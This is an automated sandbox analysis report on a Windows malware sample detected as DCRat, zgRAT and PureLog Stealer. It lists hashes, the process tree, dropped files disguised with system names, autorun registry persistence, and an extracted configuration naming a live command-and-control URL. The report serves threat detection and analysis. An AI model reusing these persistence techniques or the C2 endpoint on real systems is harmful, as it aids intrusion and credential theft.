Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Zn0uX5K1ez.exe

Overview

General Information

Sample name:Zn0uX5K1ez.exe
renamed because original name is a hash value
Original sample name:58509394a423edb98b0b1be7f18551ab.exe
Analysis ID:1523119
MD5:58509394a423edb98b0b1be7f18551ab
SHA1:4b7a8ff6ec8bd5908e306cb23d2b84ce3ff03ec3
SHA256:78fee239cf44c2ab923669b8ccf016ef117a9682e339d96de87fa2f0a45200cc
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Tries to detect debuggers (CloseHandle check)
Tries to evade analysis by execution special instruction (VM detection)
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Process Start Locations
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Zn0uX5K1ez.exe (PID: 5492 cmdline: "C:\Users\user\Desktop\Zn0uX5K1ez.exe" MD5: 58509394A423EDB98B0B1BE7F18551AB)
    • svchost.exe (PID: 5072 cmdline: "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: A87CB2A1E23600C28C1A8E6A5C6A1C52)
      • wscript.exe (PID: 7124 cmdline: "C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7008 cmdline: C:\Windows\system32\cmd.exe /c ""C:\blockhostnet\iXSXm.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • msinto.exe (PID: 6248 cmdline: "C:\blockhostnet/msinto.exe" MD5: 83152560524B250C6C27561117DF37FE)
            • csc.exe (PID: 5228 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 3708 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CA.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC35F53CF7FFB422D917B12E88668AC1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • csc.exe (PID: 2656 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 2752 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB531.tmp" "c:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • cmd.exe (PID: 400 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\klrkJh2DBx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 4388 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • w32tm.exe (PID: 6488 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
              • conhost.exe (PID: 1924 cmdline: "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe" MD5: 83152560524B250C6C27561117DF37FE)
    • explorer.exe (PID: 3460 cmdline: "C:\Users\user\AppData\Local\Temp\explorer.exe" MD5: 52AAA8C3FD6B813B713AE05AB9E4829C)
      • conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5936 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • lsass.exe (PID: 5972 cmdline: "C:\Recovery\lsass.exe" MD5: 83152560524B250C6C27561117DF37FE)
  • conhost.exe (PID: 2096 cmdline: "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe" MD5: 83152560524B250C6C27561117DF37FE)
  • explorer.exe (PID: 7148 cmdline: "C:\Windows\debug\explorer.exe" MD5: 83152560524B250C6C27561117DF37FE)
  • msinto.exe (PID: 6244 cmdline: "C:\blockhostnet\msinto.exe" MD5: 83152560524B250C6C27561117DF37FE)
  • lsass.exe (PID: 6924 cmdline: "C:\Recovery\lsass.exe" MD5: 83152560524B250C6C27561117DF37FE)
  • conhost.exe (PID: 3212 cmdline: "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe" MD5: 83152560524B250C6C27561117DF37FE)
  • explorer.exe (PID: 6076 cmdline: "C:\Windows\debug\explorer.exe" MD5: 83152560524B250C6C27561117DF37FE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://664930cm.n9shka.top/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads", "MUTEX": "DCR_MUTEX-I0F3xOgXin83Nkym1lQr", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Zn0uX5K1ez.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    Zn0uX5K1ez.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\blockhostnet\msinto.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\blockhostnet\msinto.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Windows\Globalization\Time Zone\backgroundTaskHost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 9 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000002.00000003.2104402669.0000000006800000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000002.00000003.2103951252.0000000006000000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000015.00000002.3361148000.0000000002AE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        0000000A.00000002.2399954472.000000001312B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 7 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          2.3.svchost.exe.684e6bb.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            2.3.svchost.exe.684e6bb.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              2.3.svchost.exe.604e6bb.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                2.3.svchost.exe.604e6bb.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  2.3.svchost.exe.684e6bb.1.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 19 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Execution from Suspicious Folder
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\debug\explorer.exe" , CommandLine: "C:\Windows\debug\explorer.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\debug\explorer.exe, NewProcessName: C:\Windows\debug\explorer.exe, OriginalFileName: C:\Windows\debug\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\debug\explorer.exe" , ProcessId: 7148, ProcessName: explorer.exe
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Zn0uX5K1ez.exe, ProcessId: 5492, TargetFilename: C:\Users\user\AppData\Local\Temp\svchost.exe
                                    Sigma detected: System File Execution Location Anomaly
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Zn0uX5K1ez.exe", ParentImage: C:\Users\user\Desktop\Zn0uX5K1ez.exe, ParentProcessId: 5492, ParentProcessName: Zn0uX5K1ez.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 5072, ProcessName: svchost.exe
                                    Sigma detected: Windows Binaries Write Suspicious Extensions
                                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\svchost.exe, ProcessId: 5072, TargetFilename: C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe
                                    Sigma detected: Conhost Spawned By Uncommon Parent Process
                                    Source: Process startedAuthor: Tim Rauch: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\explorer.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\explorer.exe, ParentProcessId: 3460, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 5876, ProcessName: conhost.exe
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe", EventID: 13, EventType: SetValue, Image: C:\blockhostnet\msinto.exe, ProcessId: 6248, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hPeZTHbzcsUskSflSyozwAqUA
                                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe", EventID: 13, EventType: SetValue, Image: C:\blockhostnet\msinto.exe, ProcessId: 6248, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\blockhostnet/msinto.exe", ParentImage: C:\blockhostnet\msinto.exe, ParentProcessId: 6248, ParentProcessName: msinto.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline", ProcessId: 5228, ProcessName: csc.exe
                                    Sigma detected: Suspicious Process Start Locations
                                    Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\debug\explorer.exe" , CommandLine: "C:\Windows\debug\explorer.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\debug\explorer.exe, NewProcessName: C:\Windows\debug\explorer.exe, OriginalFileName: C:\Windows\debug\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\debug\explorer.exe" , ProcessId: 7148, ProcessName: explorer.exe
                                    Sigma detected: Uncommon Svchost Parent Process
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Zn0uX5K1ez.exe", ParentImage: C:\Users\user\Desktop\Zn0uX5K1ez.exe, ParentProcessId: 5492, ParentProcessName: Zn0uX5K1ez.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 5072, ProcessName: svchost.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentProcessId: 5072, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe" , ProcessId: 7124, ProcessName: wscript.exe
                                    Sigma detected: Dynamic CSharp Compile Artefact
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\blockhostnet\msinto.exe, ProcessId: 6248, TargetFilename: C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline
                                    Sigma detected: Windows Processes Suspicious Parent Directory
                                    Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Zn0uX5K1ez.exe", ParentImage: C:\Users\user\Desktop\Zn0uX5K1ez.exe, ParentProcessId: 5492, ParentProcessName: Zn0uX5K1ez.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 5072, ProcessName: svchost.exe

                                    Data Obfuscation

                                    barindex
                                    Sigma detected: Dot net compiler compiles file from suspicious location
                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\blockhostnet/msinto.exe", ParentImage: C:\blockhostnet\msinto.exe, ParentProcessId: 6248, ParentProcessName: msinto.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline", ProcessId: 5228, ProcessName: csc.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-10-01T05:57:31.855707+020020480951A Network Trojan was detected192.168.2.64970637.44.238.25080TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: Zn0uX5K1ez.exeAvira: detected
                                    Source: Zn0uX5K1ez.exeAvira: detected
                                    Source: Zn0uX5K1ez.exeAvira: detected
                                    Antivirus detection for dropped file
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Windows\debug\explorer.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Recovery\lsass.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\Desktop\SIVCnSke.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\Desktop\crpSXvpM.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\iGvrsCDf.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\Desktop\kRRssUig.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\klrkJh2DBx.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Found malware configuration
                                    Source: 0000000A.00000002.2399954472.000000001312B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://664930cm.n9shka.top/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads", "MUTEX": "DCR_MUTEX-I0F3xOgXin83Nkym1lQr", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Multi AV Scanner detection for domain / URL
                                    Source: 664930cm.n9shka.topVirustotal: Detection: 9%Perma Link
                                    Source: http://664930cm.n9shka.topVirustotal: Detection: 9%Perma Link
                                    Source: http://664930cm.n9shka.top/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.phpVirustotal: Detection: 9%Perma Link
                                    Source: http://664930cm.n9shka.top/Virustotal: Detection: 9%Perma Link
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeReversingLabs: Detection: 75%
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeVirustotal: Detection: 56%Perma Link
                                    Source: C:\Recovery\lsass.exeReversingLabs: Detection: 75%
                                    Source: C:\Recovery\lsass.exeVirustotal: Detection: 56%Perma Link
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeReversingLabs: Detection: 70%
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeVirustotal: Detection: 65%Perma Link
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeReversingLabs: Detection: 75%
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeVirustotal: Detection: 58%Perma Link
                                    Source: C:\Users\user\Desktop\AEdPygqV.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\AEdPygqV.logVirustotal: Detection: 28%Perma Link
                                    Source: C:\Users\user\Desktop\JfNMDZUx.logVirustotal: Detection: 10%Perma Link
                                    Source: C:\Users\user\Desktop\SIVCnSke.logVirustotal: Detection: 40%Perma Link
                                    Source: C:\Users\user\Desktop\admBIJoy.logVirustotal: Detection: 10%Perma Link
                                    Source: C:\Users\user\Desktop\crpSXvpM.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\crpSXvpM.logVirustotal: Detection: 69%Perma Link
                                    Source: C:\Users\user\Desktop\iGvrsCDf.logVirustotal: Detection: 40%Perma Link
                                    Source: C:\Users\user\Desktop\kRRssUig.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\kRRssUig.logVirustotal: Detection: 69%Perma Link
                                    Source: C:\Users\user\Desktop\mFVAeiee.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\mFVAeiee.logVirustotal: Detection: 28%Perma Link
                                    Source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exeReversingLabs: Detection: 75%
                                    Source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exeVirustotal: Detection: 56%Perma Link
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeReversingLabs: Detection: 75%
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeVirustotal: Detection: 56%Perma Link
                                    Source: C:\Windows\debug\explorer.exeReversingLabs: Detection: 75%
                                    Source: C:\Windows\debug\explorer.exeVirustotal: Detection: 56%Perma Link
                                    Source: C:\blockhostnet\msinto.exeReversingLabs: Detection: 75%
                                    Source: C:\blockhostnet\msinto.exeVirustotal: Detection: 56%Perma Link
                                    Multi AV Scanner detection for submitted file
                                    Source: Zn0uX5K1ez.exeReversingLabs: Detection: 71%
                                    Source: Zn0uX5K1ez.exeVirustotal: Detection: 73%Perma Link
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeJoe Sandbox ML: detected
                                    Source: C:\Windows\debug\explorer.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\admBIJoy.logJoe Sandbox ML: detected
                                    Source: C:\Recovery\lsass.exeJoe Sandbox ML: detected
                                    Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\JfNMDZUx.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\crpSXvpM.logJoe Sandbox ML: detected
                                    Source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\kRRssUig.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: Zn0uX5K1ez.exeJoe Sandbox ML: detected
                                    Source: Zn0uX5K1ez.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: Zn0uX5K1ez.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: svchost.exe, 00000002.00000003.2104402669.0000000006800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000000.2102681512.0000000000863000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp, Zn0uX5K1ez.exe, svchost.exe.0.dr
                                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.pdb source: msinto.exe, 0000000A.00000002.2389367064.0000000003795000.00000004.00000800.00020000.00000000.sdmp
